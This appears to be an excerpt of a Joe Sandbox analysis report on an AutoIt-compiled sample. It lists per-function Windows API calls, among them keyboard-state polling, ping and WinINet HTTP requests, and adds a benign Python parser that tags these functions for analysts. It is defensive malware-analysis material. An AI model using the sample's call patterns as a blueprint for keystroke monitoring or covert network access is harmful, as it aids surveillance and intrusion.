                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 1bd38bf9d64d95716f71787c5786df324b074132e52caa0c7580de4eb0bee653
                                                      • Instruction ID: 32dbaa75055a567cb57b8bf1cb5257d4718f8ed7ac1dfb0ca1f294cb79e84d33
                                                      • Opcode Fuzzy Hash: 1bd38bf9d64d95716f71787c5786df324b074132e52caa0c7580de4eb0bee653
                                                      • Instruction Fuzzy Hash: A4417135A002199FCB04EF64C858DADBBB9FF08354F109075E85DB7261D731A946CF90
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00E99CA1
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E99D22
                                                      • GetKeyState.USER32(000000A0), ref: 00E99D3D
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E99D57
                                                      • GetKeyState.USER32(000000A1), ref: 00E99D6C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00E99D84
                                                      • GetKeyState.USER32(00000011), ref: 00E99D96
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00E99DAE
                                                      • GetKeyState.USER32(00000012), ref: 00E99DC0
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E99DD8
                                                      • GetKeyState.USER32(0000005B), ref: 00E99DEA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 48ce5893ee94d7d3c371ce5a4fde33cb93e313ddce8e19819e5975d24d2befee
                                                      • Instruction ID: 384e80dc2e23a72990fdad91a8a169dcc6bb2bac209981a492f44945bd593f49
                                                      • Opcode Fuzzy Hash: 48ce5893ee94d7d3c371ce5a4fde33cb93e313ddce8e19819e5975d24d2befee
                                                      • Instruction Fuzzy Hash: 1141D8745047C96EFF30866988447B5FEE06F12348F08905EDAC67B5C3EBA599C8C792
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00EB05BC
                                                      • inet_addr.WSOCK32(?), ref: 00EB061C
                                                      • gethostbyname.WSOCK32(?), ref: 00EB0628
                                                      • IcmpCreateFile.IPHLPAPI ref: 00EB0636
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB06C6
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB06E5
                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00EB07B9
                                                      • WSACleanup.WSOCK32 ref: 00EB07BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: b06706a56520a250df16e4f307bbefbd18b56af34221b973b6e52e9cca697aa7
                                                      • Instruction ID: 875c53e1c229d5b26edcb3d51763fda4d940807c20275baacd284f96528ff97c
                                                      • Opcode Fuzzy Hash: b06706a56520a250df16e4f307bbefbd18b56af34221b973b6e52e9cca697aa7
                                                      • Instruction Fuzzy Hash: 47918D35604211AFD320DF15D488F5BBBE4AF44318F1495AAF46AABAA2CB30FD45CF91
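                                                       The two entries above (the GetAsyncKeyState/GetKeyState loop and the WSAStartup/IcmpSendEcho routine tagged with the string "Ping") show the raw form Joe Sandbox gives each function: API names with hex arguments, then the Similarity fields. Read as named constants, the keyboard routine polls 0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU and 0x5B VK_LWIN, and the ICMP routine passes 0xFA0 = 4000 ms as IcmpSendEcho's Timeout parameter. Together with the cdecl/stdcall/winapi and READY/NOTREADY string sets in the neighbouring entries, this is consistent with the AutoIt interpreter runtime the report's overview already flags, so an analyst will usually want to separate such library functions from script-specific code quickly. The following parser is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It reads entries in the report's text layout from a constructed string (copied in shape from the two entries above, with the Opcode ID shortened), decodes the virtual-key and timeout arguments, and tags each function with a capability label; the tag names and the rules in classify() are the example's own.

```python
"""Parse Joe Sandbox per-function entries ("APIs" / "Memory Dump Source" / "Similarity"
blocks) and tag each function by what its API calls suggest.  Added example, not
Joe Sandbox's own code; the capability labels below are this example's own choice."""
import re
from dataclasses import dataclass, field

# One API line: "• Name.MODULE(arg,arg), ref: ADDR" or "• Name.MODULE ref: ADDR".
API_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# One Similarity field: "• API ID: ...", "• String ID:", "• Opcode ID: ..."
FIELD_RE = re.compile(r"^•\s*(?P<key>[\w ]+?):\s*(?P<val>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Similarity"}

# Win32 virtual-key codes for modifier keys (documented values).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}

# Constructed sample in the report's layout (two entries, hashes truncated).
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00E99CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00E99D22
• GetKeyState.USER32(000000A0), ref: 00E99D3D
• GetAsyncKeyState.USER32(00000011), ref: 00E99D84
Memory Dump Source
• Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 48ce5893ee94d7d3
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00EB05BC
• IcmpCreateFile.IPHLPAPI ref: 00EB0636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB06C6
• WSACleanup.WSOCK32 ref: 00EB07BF
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # int for an 8-digit hex literal, None for '?' or a symbolic value
    ref: int            # address of the call site


@dataclass
class Entry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # Similarity fields, keyed by label


def _parse_args(raw):
    if raw is None or raw.strip() == "":
        return []
    out = []
    for a in raw.split(","):
        a = a.strip()
        out.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None)
    return out


def parse_entries(text):
    """Split report text into Entry objects; a new entry starts at each 'APIs' header."""
    entries, current, section = [], None, None
    for line in text.splitlines():
        line = line.strip()
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                current = Entry()
                entries.append(current)
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:   # "Part of subcall function" lines do not match and are skipped
                current.calls.append(ApiCall(m["name"], m["module"],
                                             _parse_args(m["args"]), int(m["ref"], 16)))
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                current.fields[m["key"]] = m["val"]
    return entries


def modifier_keys_polled(entry):
    """Names of modifier keys passed as the first argument to GetAsyncKeyState/GetKeyState."""
    return {VK_NAMES[c.args[0]] for c in entry.calls
            if c.name in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] in VK_NAMES}


def icmp_timeout_ms(entry):
    """IcmpSendEcho's eighth parameter is Timeout in milliseconds; None if not literal."""
    for c in entry.calls:
        if c.name == "IcmpSendEcho" and len(c.args) == 8:
            return c.args[7]
    return None


def classify(entry):
    """Capability tags (this example's own labels) derived from the API combination."""
    names = {c.name for c in entry.calls}
    tags = set()
    if modifier_keys_polled(entry):
        tags.add("modifier-key polling")
    if "IcmpSendEcho" in names:
        tags.add("icmp echo (ping)")
    if "CoCreateInstance" in names:
        tags.add("COM object instantiation")
    if {"SafeArrayAccessData", "VariantCopy"} <= names:
        tags.add("SAFEARRAY/VARIANT marshalling")
    return tags


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.fields.get("API ID"), sorted(classify(e)),
              sorted(modifier_keys_polled(e)), icmp_timeout_ms(e))
```

                                                       Run against the full report text, parse_entries() yields one Entry per function; the "API ID" and "Opcode ID" fields can then be joined across reports to spot functions shared with other AutoIt-compiled samples, leaving the unshared ones as the candidates that carry the script's actual behaviour.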
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 707087890-567219261
                                                      • Opcode ID: 0a9ac5a8ef882e303368519a93bcefcfeb79a779ec3c080b9c83c1f66e61ad39
                                                      • Instruction ID: 830bd7417a12955201107c8f50963eef7d9a3d1d197141866dd2a2b83aaf6b0b
                                                      • Opcode Fuzzy Hash: 0a9ac5a8ef882e303368519a93bcefcfeb79a779ec3c080b9c83c1f66e61ad39
                                                      • Instruction Fuzzy Hash: AC518031A041169BCB14DF68CE519FFB7A9AF64328B21622AE966F73C4DB31DD40C790
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 00EB3774
                                                      • CoUninitialize.OLE32 ref: 00EB377F
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00ECFB78,?), ref: 00EB37D9
                                                      • IIDFromString.OLE32(?,?), ref: 00EB384C
                                                      • VariantInit.OLEAUT32(?), ref: 00EB38E4
                                                      • VariantClear.OLEAUT32(?), ref: 00EB3936
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 636576611-1287834457
                                                      • Opcode ID: ad3a18c06cb1443334f8190b03a8f46749e1bd4e5428df8c7115d4adfde04a63
                                                      • Instruction ID: d6b08d66435bd8d9c24c65e791f595b0600f398546879e353703dca22249e358
                                                      • Opcode Fuzzy Hash: ad3a18c06cb1443334f8190b03a8f46749e1bd4e5428df8c7115d4adfde04a63
                                                      • Instruction Fuzzy Hash: DE61B171608311AFD314DF64C84AFABBBE4AF44714F10581AF585B7291D770EE49CB92
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EA33CF
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EA33F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-3080491070
                                                      • Opcode ID: afe17a9e5e43ded3e5e51175ab8833f0d3d3a0f3bf065d1e25d41539ef07b368
                                                      • Instruction ID: f79998c2dec186e580278895ec6b86d24d25bba3c80f0275135d9346d7b4ec76
                                                      • Opcode Fuzzy Hash: afe17a9e5e43ded3e5e51175ab8833f0d3d3a0f3bf065d1e25d41539ef07b368
                                                      • Instruction Fuzzy Hash: 3B518F71D00209ABDF15EBA0CD4AEEEBBB9BF09340F206165F51572062EB752F58DB60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 1256254125-769500911
                                                      • Opcode ID: 45484e0018fb645dc678c38ff34ba6c81ca80b0441fcd406bbd4a8ebe1da7968
                                                      • Instruction ID: 651120aad14c86093001a2b91e3763037e1d09730a67341c088d83fe2052fe1d
                                                      • Opcode Fuzzy Hash: 45484e0018fb645dc678c38ff34ba6c81ca80b0441fcd406bbd4a8ebe1da7968
                                                      • Instruction Fuzzy Hash: AB41FD32A001279BCF106F7DDE915BE77A5AFA075CB24622AE421F7285E731DD81C790
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA53A0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EA5416
                                                      • GetLastError.KERNEL32 ref: 00EA5420
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00EA54A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: c716cf6cecab3700235a91105640e19d05c1632886efcbdf2b321a9af7354095
                                                      • Instruction ID: 3cbd9016dcddf7d3e7836732fd3e8d4b5d1f65b02f59231b3a1dd9e190b85ce3
                                                      • Opcode Fuzzy Hash: c716cf6cecab3700235a91105640e19d05c1632886efcbdf2b321a9af7354095
                                                      • Instruction Fuzzy Hash: 6E31E236A006049FC710DF68C484AADBBB4EF4E309F189065E516FF292D731ED86CB90
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00EC3C79
                                                      • SetMenu.USER32(?,00000000), ref: 00EC3C88
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC3D10
                                                      • IsMenu.USER32(?), ref: 00EC3D24
                                                      • CreatePopupMenu.USER32 ref: 00EC3D2E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC3D5B
                                                      • DrawMenuBar.USER32 ref: 00EC3D63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0$F
                                                      • API String ID: 161812096-3044882817
                                                      • Opcode ID: 6e44beb936add4310f44e8b545e792e1ad85e2cf69a3bc187b92e85413c23eef
                                                      • Instruction ID: bbf02fb9b3244896a24ae4191f38cc473b8e2bd85a8657c179c52dc1fa69eafb
                                                      • Opcode Fuzzy Hash: 6e44beb936add4310f44e8b545e792e1ad85e2cf69a3bc187b92e85413c23eef
                                                      • Instruction Fuzzy Hash: 5D418874A01209AFDB14CF64D944FEABBB5FF49314F14402CF94AA7360D732AA16CB90
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EC3A9D
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EC3AA0
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC3AC7
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC3AEA
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EC3B62
                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EC3BAC
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EC3BC7
                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00EC3BE2
                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00EC3BF6
                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00EC3C13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: a3586945d1d97ee09c663c54a1e9000625d41e558694c45333e78b847fe9a25b
                                                      • Instruction ID: 6241eb5832a30c863cb36564da0f1f1306fab167c909909204802854ca902f67
                                                      • Opcode Fuzzy Hash: a3586945d1d97ee09c663c54a1e9000625d41e558694c45333e78b847fe9a25b
                                                      • Instruction Fuzzy Hash: CC615975900208AFDB10DFA8CD81FEEB7F8AB09704F105199FA15A72A1D771AE46DB60
                                                      APIs
                                                      • _free.LIBCMT ref: 00E62C94
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E62CA0
                                                      • _free.LIBCMT ref: 00E62CAB
                                                      • _free.LIBCMT ref: 00E62CB6
                                                      • _free.LIBCMT ref: 00E62CC1
                                                      • _free.LIBCMT ref: 00E62CCC
                                                      • _free.LIBCMT ref: 00E62CD7
                                                      • _free.LIBCMT ref: 00E62CE2
                                                      • _free.LIBCMT ref: 00E62CED
                                                      • _free.LIBCMT ref: 00E62CFB
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E31459
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00E314F8
                                                      • UnregisterHotKey.USER32(?), ref: 00E316DD
                                                      • DestroyWindow.USER32(?), ref: 00E724B9
                                                      • FreeLibrary.KERNEL32(?), ref: 00E7251E
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E7254B
                                                      Strings
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA7FAD
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA7FC1
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00EA7FEB
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EA8005
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8017
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8060
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA80B0
                                                      Strings
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile
                                                      • String ID: *.*
                                                      • API String ID: 769691225-438819550
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00E35C7A
                                                        • Part of subcall function 00E35D0A: GetClientRect.USER32(?,?), ref: 00E35D30
                                                        • Part of subcall function 00E35D0A: GetWindowRect.USER32(?,?), ref: 00E35D71
                                                        • Part of subcall function 00E35D0A: ScreenToClient.USER32(?,?), ref: 00E35D99
                                                      • GetDC.USER32 ref: 00E746F5
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E74708
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E74716
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E7472B
                                                      • ReleaseDC.USER32(?,00000000), ref: 00E74733
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E747C4
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00EA35E4
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • LoadStringW.USER32(00F02390,?,00000FFF,?), ref: 00EA360A
                                                      Strings
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-2391861430
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                        • Part of subcall function 00E4912D: GetCursorPos.USER32(?), ref: 00E49141
                                                        • Part of subcall function 00E4912D: ScreenToClient.USER32(00000000,?), ref: 00E4915E
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000001), ref: 00E49183
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000002), ref: 00E4919D
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00EC8B6B
                                                      • ImageList_EndDrag.COMCTL32 ref: 00EC8B71
                                                      • ReleaseCapture.USER32 ref: 00EC8B77
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00EC8C12
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EC8C25
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00EC8CFF
                                                      Strings
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EAC272
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EAC29A
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EAC2CA
                                                      • GetLastError.KERNEL32 ref: 00EAC322
                                                      • SetEvent.KERNEL32(?), ref: 00EAC336
                                                      • InternetCloseHandle.WININET(00000000), ref: 00EAC341
                                                      Strings
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E73AAF,?,?,Bad directive syntax error,00ECCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E998BC
                                                      • LoadStringW.USER32(00000000,?,00E73AAF,?), ref: 00E998C3
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E99987
                                                      Strings
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 858772685-4153970271
                                                      APIs
                                                      • GetParent.USER32 ref: 00E920AB
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00E920C0
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E9214D
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
